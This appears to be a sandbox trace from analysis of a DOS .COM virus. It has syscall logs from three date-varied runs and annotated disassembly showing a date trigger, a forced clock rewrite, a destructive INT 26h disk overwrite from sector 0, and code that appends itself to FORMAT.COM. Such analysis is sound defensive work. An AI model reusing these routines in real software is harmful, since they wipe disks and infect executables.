0x12a9d: mov ah, 0x2c  ; AH=2Ch: Get time (CH = hour, CL = minutes)
0x12a9f: int 0x21
0x12aa1: cmp cl, 0xf  ; minutes >= 15 ?
0x12aa4: jae 0x12ab2  ; yes -> 0x12ab2 (outside this window)
2018-12-25T11:53:27.91241912Z 47 PC: 12ad5 | Get disk transfer address
2018-12-25T11:53:27.914339714Z 26 PC: 12ae8 | Set disk transfer address
2018-12-25T11:53:27.916695514Z 78 PC: 12b78 | Find first file
2018-12-25T11:53:27.930131469Z 79 PC: 12b7e | Find next file
2018-12-25T11:53:27.933216323Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.937113028Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.940904016Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.944175565Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.948166585Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.951709371Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.954994657Z 78 PC: 12b78 | Find first file (See above)
2018-12-25T11:53:27.980037536Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.983811207Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T11:53:27.990725695Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T11:53:29.044740793Z 61 PC: 12bd4 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:53:29.05353534Z 87 PC: 12be0 | Get or set file date and time
; Host-file preparation: read the first 3 bytes of the opened file, then seek to its end.
; The window starts on the log row below with `mov ah, 0x3f` (AH=3Fh: Read file or device).
; NOTE(review): read-3 / seek-end here, plus the write rows logged after it, matches an appending .COM infector - confirm.
2018-12-25T11:53:29.055390302Z 44 PC: 12bec | Get time 0x12bec: mov ah, 0x3f
0x12bee: mov cx, 3  ; byte count = 3
0x12bf1: mov dx, 0x69
0x12bf4: nop
0x12bf5: add dx, si  ; buffer offset = si + 0x69
0x12bf7: int 0x21
0x12bf9: jb 0x12c51  ; CF set (DOS error) -> 0x12c51
0x12bfb: cmp ax, 3
0x12bfe: jne 0x12c51  ; fewer than 3 bytes read -> 0x12c51
0x12c00: mov ax, 0x4202  ; AH=42h, AL=02h: move file pointer relative to end of file
0x12c03: mov cx, 0
0x12c06: mov dx, 0  ; offset CX:DX = 0, so DX:AX returns the file length
0x12c09: int 0x21
0x12c0b: jb 0x12c51
0x12c0d: mov cx, ax  ; CX = low word of the file length
0x12c0f: sub ax, 3
0x12c12: mov word ptr [si + 0x6c], ax  ; stores length - 3; presumably the displacement of a 3-byte jump written at the file start - confirm
0x12c15: nop
0x12c16: add cx, 0x354  ; length + 0x354; its use is not visible in this window
0x12c1a: mov di, si
2018-12-25T11:53:29.057958762Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:53:29.066097306Z 66 PC: 12c0b | Move file pointer
2018-12-25T11:53:29.067739115Z 64 PC: 12c30 | Write file or device (Write 828 bytes on handle 5)
2018-12-25T11:53:29.076585698Z 66 PC: 12c42 | Move file pointer
2018-12-25T11:53:29.084557726Z 64 PC: 12c51 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:53:29.087957825Z 87 PC: 12c64 | Get or set file date and time
2018-12-25T11:53:29.090026665Z 62 PC: 12c68 | Close file
2018-12-25T11:53:29.09939707Z 67 PC: 12c77 | Get or set file attributes
2018-12-25T11:53:29.113577384Z 26 PC: 12c84 | Set disk transfer address

{"DateBased":true,"Day":8,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5011,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:27.896137079Z 255 PC: 12a5e | UNKNOWN!
; Date gate on the INT 21h/AH=2Ah result (Get date: CX = year, DH = month, DL = day).
; The window starts on the log row below with `cmp cx, 0x7c9` (0x7c9 = 1993).
2018-12-25T11:53:27.902726509Z 42 PC: 12a6b | Get date 0x12a6b: cmp cx, 0x7c9
0x12a6f: jb 0x12a8a  ; year < 1993 -> year-1990 handling at 0x12a8a
0x12a71: jge 0x12a76  ; signed >= 1993 -> re-read the date and test month/day
0x12a73: jmp 0x12ad0  ; otherwise leave via 0x12ad0 (outside this window)
0x12a75: nop
0x12a76: mov ah, 0x2a  ; AH=2Ah: Get date again
0x12a78: int 0x21
0x12a7a: cmp dh, 9  ; month >= 9 ?
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0  ; no -> 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8  ; day >= 8 ?
0x12a85: jge 0x12aa8  ; yes -> 0x12aa8 (outside this window)
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a8e: je 0x12a9d  ; year already 1990 -> skip the clock change
0x12a90: mov ah, 0x2b  ; AH=2Bh: Set date
0x12a92: mov cx, 0x7c6  ; year forced to 1990; DH/DL are not reloaded here
0x12a95: int 0x21  ; rewrites the system date: a host-visible side effect worth alerting on
2018-12-25T11:53:27.905421272Z 43 PC: 12a97 | Set date
2018-12-25T11:53:27.909451832Z 45 PC: 12a9d | Set time
; Payload path: minute check, message print, then an INT 26h absolute disk write.
; The window starts on the log row below with `cmp cl, 0xf` (CL = minutes from Get time).
; NOTE(review): this is the disassembly following the logged PC; no row in the syscall table corresponds to the INT 26h - confirm whether the sandbox records it.
2018-12-25T11:53:27.913434809Z 44 PC: 12aa1 | Get time 0x12aa1: cmp cl, 0xf
0x12aa4: jae 0x12ab2  ; minutes >= 15 -> disk-write check, skipping the message
0x12aa6: jmp 0x12a76  ; otherwise back to the Get-date / month / day test
0x12aa8: mov ah, 9  ; AH=09h: print the '$'-terminated string at DS:DX
0x12aaa: mov dx, si
0x12aac: add dx, 0x41  ; string offset = si + 0x41
0x12aaf: nop
0x12ab0: int 0x21
0x12ab2: cmp byte ptr [si], 0x1a
0x12ab5: nop
0x12ab6: nop
0x12ab7: ja 0x12ad0  ; byte at [si] > 0x1a -> skip the write
0x12ab9: pushf
0x12aba: mov al, byte ptr [si]  ; AL = drive number for INT 26h, taken from [si]
0x12abc: nop
0x12abd: nop
0x12abe: mov cx, 0x100  ; CX = 0x100 (256) sectors
0x12ac1: mov dx, 0  ; DX = first logical sector 0
0x12ac4: mov bx, 1  ; DS:BX = source buffer (offset 1)
0x12ac7: int 0x26  ; DOS absolute disk write: destructive, overwrites the start of the volume (boot sector onward)
; Month/day test on the Get-date result (DH = month, DL = day), then the year-1990 clock rewrite.
; The window starts on the log row below with `cmp dh, 9`.
2018-12-25T11:53:27.917147213Z 42 PC: 12a7a | Get date 0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82  ; month >= 9 -> test the day
0x12a7f: jmp 0x12ad0  ; otherwise leave via 0x12ad0 (outside this window)
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8  ; day >= 8 -> 0x12aa8 (outside this window)
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a8e: je 0x12a9d  ; year already 1990 -> go straight to Get time
0x12a90: mov ah, 0x2b  ; AH=2Bh: Set date
0x12a92: mov cx, 0x7c6  ; year forced to 1990
0x12a95: int 0x21
0x12a97: mov ah, 0x2d  ; AH=2Dh: Set time
0x12a99: mov cl, 1  ; minutes = 1; the other time registers are not set in this window
0x12a9b: int 0x21
0x12a9d: mov ah, 0x2c  ; AH=2Ch: Get time (CH = hour, CL = minutes)
0x12a9f: int 0x21
0x12aa1: cmp cl, 0xf  ; minutes >= 15 ?
0x12aa4: jae 0x12ab2  ; yes -> 0x12ab2 (outside this window)
2018-12-25T11:53:27.919742957Z 9 PC: 12ab2 | Display string (String= ' The I.R.Army lives....... ')
2018-12-25T11:53:27.9263914Z 47 PC: 12ad5 | Get disk transfer address
2018-12-25T11:53:27.928507399Z 26 PC: 12ae8 | Set disk transfer address
2018-12-25T11:53:27.929789566Z 78 PC: 12b78 | Find first file
2018-12-25T11:53:27.942229553Z 79 PC: 12b7e | Find next file
2018-12-25T11:53:27.945995454Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.94898796Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.95227335Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.956563958Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.959411132Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.962236814Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.966319395Z 78 PC: 12b78 | Find first file (See above)
2018-12-25T11:53:27.982088685Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.985526617Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T11:53:27.992802988Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T11:53:29.044712136Z 61 PC: 12bd4 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:53:29.049495434Z 87 PC: 12be0 | Get or set file date and time
; Host-file preparation: read the first 3 bytes of the opened file, then seek to its end.
; The window starts on the log row below with `mov ah, 0x3f` (AH=3Fh: Read file or device).
; NOTE(review): read-3 / seek-end here, plus the write rows logged after it, matches an appending .COM infector - confirm.
2018-12-25T11:53:29.051264047Z 44 PC: 12bec | Get time 0x12bec: mov ah, 0x3f
0x12bee: mov cx, 3  ; byte count = 3
0x12bf1: mov dx, 0x69
0x12bf4: nop
0x12bf5: add dx, si  ; buffer offset = si + 0x69
0x12bf7: int 0x21
0x12bf9: jb 0x12c51  ; CF set (DOS error) -> 0x12c51
0x12bfb: cmp ax, 3
0x12bfe: jne 0x12c51  ; fewer than 3 bytes read -> 0x12c51
0x12c00: mov ax, 0x4202  ; AH=42h, AL=02h: move file pointer relative to end of file
0x12c03: mov cx, 0
0x12c06: mov dx, 0  ; offset CX:DX = 0, so DX:AX returns the file length
0x12c09: int 0x21
0x12c0b: jb 0x12c51
0x12c0d: mov cx, ax  ; CX = low word of the file length
0x12c0f: sub ax, 3
0x12c12: mov word ptr [si + 0x6c], ax  ; stores length - 3; presumably the displacement of a 3-byte jump written at the file start - confirm
0x12c15: nop
0x12c16: add cx, 0x354  ; length + 0x354; its use is not visible in this window
0x12c1a: mov di, si
2018-12-25T11:53:29.062042118Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:53:29.068204719Z 66 PC: 12c0b | Move file pointer
2018-12-25T11:53:29.070051818Z 64 PC: 12c30 | Write file or device (Write 828 bytes on handle 5)
2018-12-25T11:53:29.07869573Z 66 PC: 12c42 | Move file pointer
2018-12-25T11:53:29.080310461Z 64 PC: 12c51 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:53:29.083651572Z 87 PC: 12c64 | Get or set file date and time
2018-12-25T11:53:29.08752379Z 62 PC: 12c68 | Close file
2018-12-25T11:53:29.094719705Z 67 PC: 12c77 | Get or set file attributes
2018-12-25T11:53:29.106877112Z 26 PC: 12c84 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5011,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:28.09787686Z 255 PC: 12a5e | UNKNOWN!
; Date gate on the INT 21h/AH=2Ah result (Get date: CX = year, DH = month, DL = day).
; The window starts on the log row below with `cmp cx, 0x7c9` (0x7c9 = 1993).
2018-12-25T11:53:28.099595962Z 42 PC: 12a6b | Get date 0x12a6b: cmp cx, 0x7c9
0x12a6f: jb 0x12a8a  ; year < 1993 -> year-1990 handling at 0x12a8a
0x12a71: jge 0x12a76  ; signed >= 1993 -> re-read the date and test month/day
0x12a73: jmp 0x12ad0  ; otherwise leave via 0x12ad0 (outside this window)
0x12a75: nop
0x12a76: mov ah, 0x2a  ; AH=2Ah: Get date again
0x12a78: int 0x21
0x12a7a: cmp dh, 9  ; month >= 9 ?
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0  ; no -> 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8  ; day >= 8 ?
0x12a85: jge 0x12aa8  ; yes -> 0x12aa8 (outside this window)
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a8e: je 0x12a9d  ; year already 1990 -> skip the clock change
0x12a90: mov ah, 0x2b  ; AH=2Bh: Set date
0x12a92: mov cx, 0x7c6  ; year forced to 1990; DH/DL are not reloaded here
0x12a95: int 0x21  ; rewrites the system date: a host-visible side effect worth alerting on
2018-12-25T11:53:28.102312928Z 43 PC: 12a97 | Set date
2018-12-25T11:53:28.106536753Z 45 PC: 12a9d | Set time
; Payload path: minute check, message print, then an INT 26h absolute disk write.
; The window starts on the log row below with `cmp cl, 0xf` (CL = minutes from Get time).
; NOTE(review): this is the disassembly following the logged PC; no row in the syscall table corresponds to the INT 26h - confirm whether the sandbox records it.
2018-12-25T11:53:28.109750695Z 44 PC: 12aa1 | Get time 0x12aa1: cmp cl, 0xf
0x12aa4: jae 0x12ab2  ; minutes >= 15 -> disk-write check, skipping the message
0x12aa6: jmp 0x12a76  ; otherwise back to the Get-date / month / day test
0x12aa8: mov ah, 9  ; AH=09h: print the '$'-terminated string at DS:DX
0x12aaa: mov dx, si
0x12aac: add dx, 0x41  ; string offset = si + 0x41
0x12aaf: nop
0x12ab0: int 0x21
0x12ab2: cmp byte ptr [si], 0x1a
0x12ab5: nop
0x12ab6: nop
0x12ab7: ja 0x12ad0  ; byte at [si] > 0x1a -> skip the write
0x12ab9: pushf
0x12aba: mov al, byte ptr [si]  ; AL = drive number for INT 26h, taken from [si]
0x12abc: nop
0x12abd: nop
0x12abe: mov cx, 0x100  ; CX = 0x100 (256) sectors
0x12ac1: mov dx, 0  ; DX = first logical sector 0
0x12ac4: mov bx, 1  ; DS:BX = source buffer (offset 1)
0x12ac7: int 0x26  ; DOS absolute disk write: destructive, overwrites the start of the volume (boot sector onward)
; Month/day test on the Get-date result (DH = month, DL = day), then the year-1990 clock rewrite.
; The window starts on the log row below with `cmp dh, 9`.
2018-12-25T11:53:28.112684325Z 42 PC: 12a7a | Get date 0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82  ; month >= 9 -> test the day
0x12a7f: jmp 0x12ad0  ; otherwise leave via 0x12ad0 (outside this window)
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8  ; day >= 8 -> 0x12aa8 (outside this window)
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a8e: je 0x12a9d  ; year already 1990 -> go straight to Get time
0x12a90: mov ah, 0x2b  ; AH=2Bh: Set date
0x12a92: mov cx, 0x7c6  ; year forced to 1990
0x12a95: int 0x21
0x12a97: mov ah, 0x2d  ; AH=2Dh: Set time
0x12a99: mov cl, 1  ; minutes = 1; the other time registers are not set in this window
0x12a9b: int 0x21
0x12a9d: mov ah, 0x2c  ; AH=2Ch: Get time (CH = hour, CL = minutes)
0x12a9f: int 0x21
0x12aa1: cmp cl, 0xf  ; minutes >= 15 ?
0x12aa4: jae 0x12ab2  ; yes -> 0x12ab2 (outside this window)
2018-12-25T11:53:28.114956559Z 47 PC: 12ad5 | Get disk transfer address
2018-12-25T11:53:28.116122902Z 26 PC: 12ae8 | Set disk transfer address
2018-12-25T11:53:28.117797711Z 78 PC: 12b78 | Find first file
2018-12-25T11:53:28.131725668Z 79 PC: 12b7e | Find next file
2018-12-25T11:53:28.1355423Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:28.138162144Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:28.140140664Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:28.142067883Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:28.144779635Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:28.147596103Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:28.150350506Z 78 PC: 12b78 | Find first file (See above)
2018-12-25T11:53:28.161558098Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:28.165433248Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T11:53:28.172163356Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T11:53:29.045045446Z 61 PC: 12bd4 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:53:29.052773898Z 87 PC: 12be0 | Get or set file date and time
; Host-file preparation: read the first 3 bytes of the opened file, then seek to its end.
; The window starts on the log row below with `mov ah, 0x3f` (AH=3Fh: Read file or device).
; NOTE(review): read-3 / seek-end here, plus the write rows logged after it, matches an appending .COM infector - confirm.
2018-12-25T11:53:29.054438053Z 44 PC: 12bec | Get time 0x12bec: mov ah, 0x3f
0x12bee: mov cx, 3  ; byte count = 3
0x12bf1: mov dx, 0x69
0x12bf4: nop
0x12bf5: add dx, si  ; buffer offset = si + 0x69
0x12bf7: int 0x21
0x12bf9: jb 0x12c51  ; CF set (DOS error) -> 0x12c51
0x12bfb: cmp ax, 3
0x12bfe: jne 0x12c51  ; fewer than 3 bytes read -> 0x12c51
0x12c00: mov ax, 0x4202  ; AH=42h, AL=02h: move file pointer relative to end of file
0x12c03: mov cx, 0
0x12c06: mov dx, 0  ; offset CX:DX = 0, so DX:AX returns the file length
0x12c09: int 0x21
0x12c0b: jb 0x12c51
0x12c0d: mov cx, ax  ; CX = low word of the file length
0x12c0f: sub ax, 3
0x12c12: mov word ptr [si + 0x6c], ax  ; stores length - 3; presumably the displacement of a 3-byte jump written at the file start - confirm
0x12c15: nop
0x12c16: add cx, 0x354  ; length + 0x354; its use is not visible in this window
0x12c1a: mov di, si
2018-12-25T11:53:29.056879049Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:53:29.063586548Z 66 PC: 12c0b | Move file pointer
2018-12-25T11:53:29.065052532Z 64 PC: 12c30 | Write file or device (Write 828 bytes on handle 5)
2018-12-25T11:53:29.074585674Z 66 PC: 12c42 | Move file pointer
2018-12-25T11:53:29.077512164Z 64 PC: 12c51 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:53:29.080999487Z 87 PC: 12c64 | Get or set file date and time
2018-12-25T11:53:29.082897056Z 62 PC: 12c68 | Close file
2018-12-25T11:53:29.096559054Z 67 PC: 12c77 | Get or set file attributes
2018-12-25T11:53:29.108009691Z 26 PC: 12c84 | Set disk transfer address